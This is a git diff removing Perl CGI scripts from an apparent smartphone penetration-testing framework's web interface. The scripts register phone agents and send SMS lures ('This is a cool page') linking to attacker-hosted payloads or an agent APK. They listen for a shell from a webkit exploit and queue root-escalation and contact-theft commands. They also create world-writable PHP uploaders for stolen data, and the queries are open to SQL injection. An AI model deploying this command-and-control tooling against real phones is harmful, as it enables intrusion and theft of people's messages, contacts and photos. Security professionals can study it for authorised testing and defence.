- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- $command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool page: " . $link;
- print CONTROLFILE $command2;
- close(CONTROLFILE);
- $vulnerable = "no";
- $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
- if ($data_socket = $socket->accept())
- {
- $data="/system/bin/id\n";
- print $data_socket $data;
- $data=<$data_socket>;
- print $data;
- close($data_socket);
- $vulnerable = "yes";
- }
-
-
-
-$table = "client";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $number2 = "\'" . $number . "\'";
- $vulnerable2 = "\'" . $vulnerable . "\'";
- $webkit = "\'" . "webkit" . "\'";
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $number2 = "\"" . $number . "\"";
- $vulnerable2 = "\"" . $vulnerable . "\"";
- $webkit = "\"" . "webkit" . "\"";
- }
- $insertquery = "INSERT INTO $table (id,number,exploit,vuln) VALUES (DEFAULT,$number2,$webkit,$vulnerable2)";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
145 frameworkgui/attach2Agents.pl
@@ -1,145 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$number1 = $FORM{"agentPhNo"};
-$number21 = $FORM{"controlPhNo"};
-$path1 = $FORM{"agentURLPath"};
-$key1 = $FORM{"agentControlKey"};
-$platform1 = $FORM{"platformDD1"};
-
-##----- put your code here
- $dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
- $webserver = $Variables{"WEBSERVER"};
- $fullpath = $webserver. $path;
- $command1 = "mkdir " . $fullpath;
- system($command1);
- $controlfile = $fullpath . "/control";
- $command2 = "touch " . $controlfile;
- system($command2);
- $command3 = "chmod 777 " . $controlfile;
- system($command3);
- $picturefile = $fullpath . "/picture.jpg";
- $command4 = "touch " . $picturefile;
- system($command4);
- $command5 = "chmod 777 " . $picturefile;
- system($command5);
- $textfile = $fullpath . "/text.txt";
- $command6 = "touch " . $textfile;
- system($command6);
- $command7 = "chmod 777 " . $textfile;
- system($command7);
- $pictureupload = $fullpath . "/pictureupload.php";
- $command8 = "touch " . $pictureupload;
- system($command8);
- $command9 = "chmod 777 " . $pictureupload;
- system($command9);
- $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
- open(PICFILE, ">$pictureupload");
- print PICFILE $pictureuploadtext;
- close(PICFILE);
- $textupload = $fullpath . "/textuploader.php";
- $command10 = "touch " . $textupload;
- system($command10);
- $command11 = "chmod 777 " . $textupload;
- system($command11);
- $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(TEXTFILE, ">$textupload");
- print TEXTFILE $textuploadtext;
- close(TEXTFILE);
- $controlupload = $fullpath . "/controluploader.php";
- $command12 = "touch " . $controlupload;
- system($command12);
- $command13 = "chmod 777 " . $controlupload;
- system($command13);
- $controluploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('control','wb');\nfwrite(\$file, \$base);\n?>";
- open(CONTROLFILE, ">$controlupload");
- print CONTROLFILE $controluploadtext;
- close(CONTROLFILE);
- $putfile = $fullpath . "/putfunc";
- $command14 = "touch " . $putfile;
- system($command14);
- $command15 = "chmod 777 " . $putfile;
- system($command15);
- $table = "agents";
- $table2 = "data";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $number2 = "\'" . $number1 . "\'";
- $path2 = "\'" . $path1 . "\'";
- $key2 = "\'" . $key1 . "\'";
- $controlnumber2 = "\'" . $number21 . "\'";
- $platform2 = "\'" . $platform1 . "\'";
- $query2 = "SELECT id from agents where number=" . "\'" . $number1 . "\'";
-
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $number2 = "\"" . $number1 . "\"";
- $path2 = "\"" . $path1 . "\"";
- $key2 = "\"" . $key1 . "\"";
- $controlnumber2 = "\"" . $number21 . "\"";
- $platform2 = "\"" . $platform1 . "\"";
- $query2 = "SELECT id from agents where number=" . $number1;
-
- }
-
- $insertquery = "INSERT INTO $table (id,number,path,controlkey,controlnumber,platform) VALUES (DEFAULT,$number2,$path2,$key2,$controlnumber2,$platform2)";
- $insertquery2 = "INSERT INTO $table2 (id,sms,contacts,picture,root) VALUES (DEFAULT, NULL, NULL, NULL, NULL)";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- $sql2 = $dbh->prepare($insertquery2);
- $sql2->execute;
- $sql = $dbh->prepare($query2);
- $idblah = $sql->execute;
- @rows = $sql->fetchrow_array();
- $id = @rows[0];
- $startcommand = "perl agentpoll.pl " . $path1 . " " . $key1 . " " . $id;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
- system($startcommand);
- }
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
193 frameworkgui/attachMobileModem.pl
@@ -1,193 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$number = $FORM{"modemPhoneNo"};
-$key = $FORM{"controlKey"};
-$path = $FORM{"appURLPath"};
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
-#print "Content-type: text/html\r\n\r\n";
-#print "Connect Smartphone App";
- $webserver = $Variables{WEBSERVER};
- $fullpath = $webserver. $path;
- $type = "app";
- $number2 = "\"" . $number . "\"";
- $path2 = "\"" . $path . "\"";
- $key2 = "\"" . $key . "\"";
- $type2 = "\"" . $type . "\"";
- $command1 = "mkdir " . $fullpath;
- system($command1);
- $connectfile = $fullpath . "/connect";
- $command2 = "touch " . $connectfile;
- system($command2);
- $command3 = "chmod 777 " . $connectfile;
- system($command3);
- $picturefile = $fullpath . "/picture.jpg";
- $command4 = "touch " . $picturefile;
- system($command4);
- $command5 = "chmod 777 " . $picturefile;
- system($command5);
- $textfile = $fullpath . "/text.txt";
- $command6 = "touch " . $textfile;
- system($command6);
- $command7 = "chmod 777 " . $textfile;
- system($command7);
- $textfile2 = $fullpath . "/text2.txt";
- $command77 = "touch ". $textfile2;
- system($command77);
- $command7777 = "chmod 777 " . $textfile2;
- system($command7777);
- $pictureupload = $fullpath . "/pictureupload.php";
- $command8 = "touch " . $pictureupload;
- system($command8);
- $command9 = "chmod 777 " . $pictureupload;
- system($command9);
- $pictureuploadtext = "<?php\n\$base=\$_REQUEST['picture'];\necho \$base;\n\$binary=base64_decode(\$base);\nheader('Content-Type: bitmap; charset=utf-8');\n\$file = fopen('picture.jpg', 'wb');\nfwrite(\$file, \$binary);\nfclose(\$file);\n?>";
- open(PICFILE, ">$pictureupload");
- print PICFILE $pictureuploadtext;
- close(PICFILE);
- $textupload = $fullpath . "/textuploader.php";
- $command10 = "touch " . $textupload;
- system($command10);
- $command11 = "chmod 777 " . $textupload;
- system($command11);
- $textuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(TEXTFILE, ">$textupload");
- print TEXTFILE $textuploadtext;
- close(TEXTFILE);
- $text2upload = $fullpath . "/text2uploader.php";
- $command100 = "touch " . $text2upload;
- system($command100);
- $command110 = "chmod 777 " . $text2upload;
- system($command110);
- $text2uploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('text2.txt', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(TEXT2FILE, ">$text2upload");
- print TEXT2FILE $text2uploadtext;
- close(TEXT2FILE);
- $connectupload = $fullpath . "/connectuploader.php";
- $command12 = "touch " . $connectupload;
- system($command12);
- $command13 = "chmod 777 " . $connectupload;
- system($command13);
- $connectuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('connect','wb');\nfwrite(\$file, \$base);\n?>";
- open(CONNECTFILE, ">$connectupload");
- print CONNECTFILE $connectuploadtext;
- close(CONNECTFILE);
- $getfuncfile = $fullpath . "/getfunc";
- $command6 = "touch " . $getfuncfile;
- system($command6);
- $command7 = "chmod 777 " . $getfuncfile;
- system($command7);
- $putfuncfile = $fullpath . "/putfunc";
- $command6 = "touch " . $putfuncfile;
- system($command6);
- $command7 = "chmod 777 " . $putfuncfile;
- system($command7);
- $getfuncupload = $fullpath . "/getfuncuploader.php";
- $command10 = "touch " . $getfuncupload;
- system($command10);
- $command11 = "chmod 777 " . $getfuncupload;
- system($command11);
- $getfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('getfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(GETFUNCUPLOADFILE, ">$getfuncupload");
- print GETFUNCUPLOADFILE $getfuncuploadtext;
- close(GETFUNCUPLOADFILE);
- $putfuncupload = $fullpath . "/putfuncuploader.php";
- $command10 = "touch " . $putfuncupload;
- system($command10);
- $command11 = "chmod 777 " . $putfuncupload;
- system($command11);
- $putfuncuploadtext = "<?php\n\$base=\$_REQUEST['text'];\nheader('Content-Type: text; charset=utf-8');\n\$file = fopen('putfunc', 'wb');\nfwrite(\$file, \$base);\n?>";
- open(PUTFUNCUPLOADFILE, ">$putfuncupload");
- print PUTFUNCUPLOADFILE $putfuncuploadtext;
- close(PUTFUNCUPLOADFILE);
- while(1){
- $fullpath1 = $webserver. $path . "/connect";
- open(CONNECTFILE, "+<$fullpath1");
- $line= <CONNECTFILE>;
- $correctstring = $key . " CONNECT";
- if ($line eq $correctstring)
- {
- $command = "\n" . $key . " CONNECTED";
- print CONNECTFILE $command;
- close(CONNECTFILE);
- # print "CONNECTED!\n";
- last;
- }
- else {
- close(CONNECTFILE);
- # sleep(1);
- }
- }
- $table = "modems";
- $modemtype = "app";
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $number2 = "\'" . $number . "\'";
- $path2 = "\'" . $path . "\'";
- $key2 = "\'" . $key . "\'";
- $type2 = "\'" . $modemtype . "\'";
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $number2 = "\"" . $number . "\"";
- $path2 = "\"" . $path . "\"";
- $key2 = "\"" . $key . "\"";
- $type2 = "\"" . $modemtype . "\"";
- }
- $insertquery = "INSERT INTO $table (id,number,path,controlkey,type) VALUES (DEFAULT,$number2,$path2,$key2, $type2)";
- $sql = $dbh->prepare($insertquery);
- $sql->execute;
- $startcommand = "perl poller.pl " . $path . " " . $key;
- $pid = fork;
- die "fork failed" unless defined $pid;
- if ($pid ==0)
- {
- system($startcommand);
- }
-
-
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
BIN frameworkgui/bulb.jpg
Deleted file not rendered
21 frameworkgui/config
@@ -1,21 +0,0 @@
-#SMARTPHONE PENTEST FRAMEWORK CONFIG FILE
-#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR FILES
-WEBSERVER = /var/www
-#IPADDRESS FOR WEBSERVER (webserver needs to be listening on this address)
-IPADDRESS = 192.168.20.33
-#IP ADDRESS TO LISTEN ON FOR SHELLS
-SHELLIPADDRESS = 192.168.20.33
-#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST
-MYSQLSERVER = 127.0.0.1
-#DATABASE TYPE (Mysql of Postgresql)
-DATABASETYPE = mysql
-#USERNAME OF THE MYSQL USER TO USE
-MYSQLUSER = root
-#PASSWORD OF THE MYSQL USER TO USE
-MYSQLPASS = toor
-#PORT MYSQL IS RUNNING ON (3306 IS DEFAULT)
-MYSQLPORT = 3306
-#LOCATION OF ANDROID APK FOR AGENT DROP
-ANDROIDAGENT = /var/www/frameworkgui/AndroidAgent.apk
-#LOCATION OF IPHONE DEB FOR AGENT DROP
-IPHONEAGENT = /var/www/frameworkgui/iphone.deb
74 frameworkgui/createDatabase.pl
@@ -1,74 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-$dir = getcwd;
-$configfile = $dir . "/config";
- open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$Variables{"OS"} = $^O;
-
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
-
- $dropquery1 = "DROP TABLE IF EXISTS agents";
- $dropquery2 = "DROP TABLE IF EXISTS data";
- $dropquery3 = "DROP TABLE IF EXISTS modems";
- $dropquery4 = "DROP TABLE IF EXISTS remote";
- $dropquery5 = "DROP TABLE IF EXISTS client";
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver","$username","$password");
- $createquery1 = "create table agents (id SERIAL NOT NULL PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))"
-;
- $createquery2 = "create table data (id SERIAL NOT NULL PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
- $createquery3 = "create table modems (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
- $createquery4 = "create table remote (id SERIAL NOT NULL PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
- $createquery5 = "create table client (id SERIAL NOT NULL PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
-
- }
- elsif ($type eq "mysql")
- {
- $createquery1 = "create table agents (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12),path varchar(1000), controlkey varchar(7), controlnumber varchar(12), platform varchar(12))";
- $createquery2 = "create table data (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, sms varchar(2000),contacts varchar(1000), picture varchar(100), root varchar(5))";
- $createquery3 = "create table modems (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), path varchar(1000), controlkey varchar(7), type varchar(3))";
- $createquery4 = "create table remote (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, ip varchar(15), exploit varchar(200), vuln varchar(3), agent varchar(3))";
- $createquery5 = "create table client (id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, number varchar(12), exploit varchar(200), vuln varchar(3))";
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $sql = $dbh->prepare($dropquery1);
- $sql->execute;
- $sql = $dbh->prepare($dropquery2);
- $sql->execute;
- $sql = $dbh->prepare($dropquery3);
- $sql->execute;
- $sql = $dbh->prepare($dropquery4);
- $sql->execute;
- $sql = $dbh->prepare($dropquery5);
- $sql->execute;
- $sql = $dbh->prepare($createquery1);
- $sql->execute;
- $sql = $dbh->prepare($createquery2);
- $sql->execute;
- $sql = $dbh->prepare($createquery3);
- $sql->execute;
- $sql = $dbh->prepare($createquery4);
- $sql->execute;
- $sql = $dbh->prepare($createquery5);
- $sql->execute;
-#####This sends it back to the main page.
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
-
65 frameworkgui/directdownload.pl
@@ -1,65 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-$webserver = $Variables{"WEBSERVER"};
- $sqlserver = $Variables{"MYSQLSERVER"};
- $ipaddress = $Variables{"IPADDRESS"};
-$path = $ARGV[0];
- $filename = $ARGV[1];
- $number = $ARGV[2];
-$platform = $ARGV[3];
-$modem = $ARGV[4];
-chomp($platform);
-if ($platform eq "android")
-{
-$link = "http://" . $ipaddress . $path . $filename;
- $fullpath = $webserver. $path;
- $command1 = "mkdir " . $fullpath;
- system($command1);
- $location = $Variables{"ANDROIDAGENT"};
-
- $command = "cp " . $location . " " . $webserver . $path . $filename;
- system($command);
-
-
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- }
-
- $pathquery = "SELECT path from modems where id=" . $modem;
- $sql = $dbh->prepare($pathquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path2 = @rows[0];
- $keyquery = "SELECT controlkey from modems where id=" . $modem;
- $sql = $dbh->prepare($keyquery);
- $results2 = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key2 = @rows[0];
- $control = $webserver . $path2 . "/getfunc";
- open(CONTROLFILE, ">$control");
- $command2 = $key2 . " " . "SEND" . " " . $number . " " . "This is a cool app: " . $link;
- print CONTROLFILE $command2;
- close(CONTROLFILE);
-}
105 frameworkgui/escalatePrivileges.pl
@@ -1,105 +0,0 @@
-#!/usr/bin/perl
-use Cwd;
-use DBI;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$agent = $FORM{"agentsDD"};
-$delivery = $FORM{"deliveryMethodRB"};
-$modemNo = $FORM{"modemNoDD"};
-
-
-
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $selectquery = "SELECT path from agents where number=" . "\'" . $agent . "\'";
- $selectquery2 = "SELECT controlkey from agents where number=" . "\'" . $agent . "\'";
- $selectquery3 = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $selectquery = "SELECT path from agents where number=" . $agent;
- $selectquery2 = "SELECT controlkey from agents where number=" . $agent;
- $selectquery3 = "SELECT id from modems where number=" . $modemNo;
- }
-
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path = @rows[0];
- $sql = $dbh->prepare($selectquery2);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key = @rows[0];
-if ($delivery eq "HTTP")
- {
- $command = $key . " ROOT HTTP\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
- }
- if ($delivery eq "SMS")
- {
-
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " " . "ROOT HTTP" . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-}
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
-
-
-
-
151 frameworkgui/getContacts.pl
@@ -1,151 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$agent = $FORM{"agentsDD"};
-$deliverymethod = $FORM{"deliveryMethodRB"};
-$returnmethod = $FORM{"returnMethodRB"};
-$modemNo = $FORM{"modemNoDD"};
-
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $selectquery = "SELECT path from agents where number=" . "\'" . $agent . "\'";
- $selectquery2 = "SELECT controlkey from agents where number=" . "\'" . $agent . "\'";
- $selectquery3 = "SELECT id from modems where number=" . "\'" . $modemNo . "\'";
-
-
- }
- elsif ($type eq "mysql")
- {
- $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
- $selectquery = "SELECT path from agents where number=" . $agent;
- $selectquery2 = "SELECT controlkey from agents where number=" . $agent;
- $selectquery3 = "SELECT id from modems where number=" . $modemNo;
-
-
- }
-
- $sql = $dbh->prepare($selectquery);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $path = @rows[0];
- $sql = $dbh->prepare($selectquery2);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $key = @rows[0];
-if ($returnmethod eq "SMS")
- {
-
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- if ($deliverymethod eq "HTTP")
- {
- $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
-
- }
- if ($deliverymethod eq "SMS")
- {
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
- }
- }
-
-
- if ($returnmethod eq "HTTP")
- {
-
- if ($deliverymethod eq "HTTP")
- {
- $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
- }
- if ($deliverymethod eq "SMS")
- {
-
- $sql = $dbh->prepare($selectquery3);
- $results = $sql->execute;
- @rows = $sql->fetchrow_array();
- $modem = @rows[0];
- $command = $key . " CONT " . $deliverymethod . " " . $returnmethod . " " . $modem . "\n";
- $control = $webserver . $path . "/putfunc";
- open(CONTROLFILE, ">>$control");
- print CONTROLFILE $command;
- close(CONTROLFILE);
-
-
-
- }
-
- }
-
-
-
-
-##----- end of your code
-
-my $url = "menu.pl";
-print "Location: $url\n\n";
-
137 frameworkgui/getDatabase.pl
@@ -1,137 +0,0 @@
-#!/usr/bin/perl
-use DBI;
-use Cwd;
-
-# Read the standard input (sent by the form):
-read(STDIN, $FormData, $ENV{'CONTENT_LENGTH'});
-# Get the name and value for each form input:
-@pairs = split(/&/, $FormData);
-# Then for each name/value pair....
-foreach $pair (@pairs) {
- # Separate the name and value:
- ($name, $value) = split(/=/, $pair);
- # Convert + signs to spaces:
- $value =~ tr/+/ /;
- # Convert hex pairs (%HH) to ASCII characters:
- $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
- # Store values in a hash called %FORM:
- $FORM{$name} = $value;
-}
-
-
-$agent = $FORM{"agentsDD"};
-$deliverymethod = $FORM{"deliveryMethodRB"};
-$returnmethod = $FORM{"returnMethodRB"};
-$modemNo = $FORM{"modemNoDD"};
-
-
-
-##----- put your code here
-$dir = getcwd;
-$configfile = $dir . "/config";
-open(CONFIG, "+<$configfile");
-while (<CONFIG>)
-{
- chomp;
- s/#.*//;
- s/^\s+//;
- s/\s+$//;
- ($var, $value) = split(/\s*=\s*/, $_, 2);
- $Variables{$var} = ${value};
-}
-#print "Content-type: text/html\r\n\r\n";
-$webserver = $Variables{"WEBSERVER"};
-
-$Variables{"OS"} = $^O;
- $sqlserver = $Variables{"MYSQLSERVER"};
- $username = $Variables{"MYSQLUSER"};
- $password = $Variables{"MYSQLPASS"};
- $port = $Variables{"MYSQLPORT"};
- $type = $Variables{"DATABASETYPE"};
- if ($type eq "postgres")
- {
- $dbh = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password);
- $selectquery = "SELECT path from agents where number=" . "\'" . $agent . "\'";
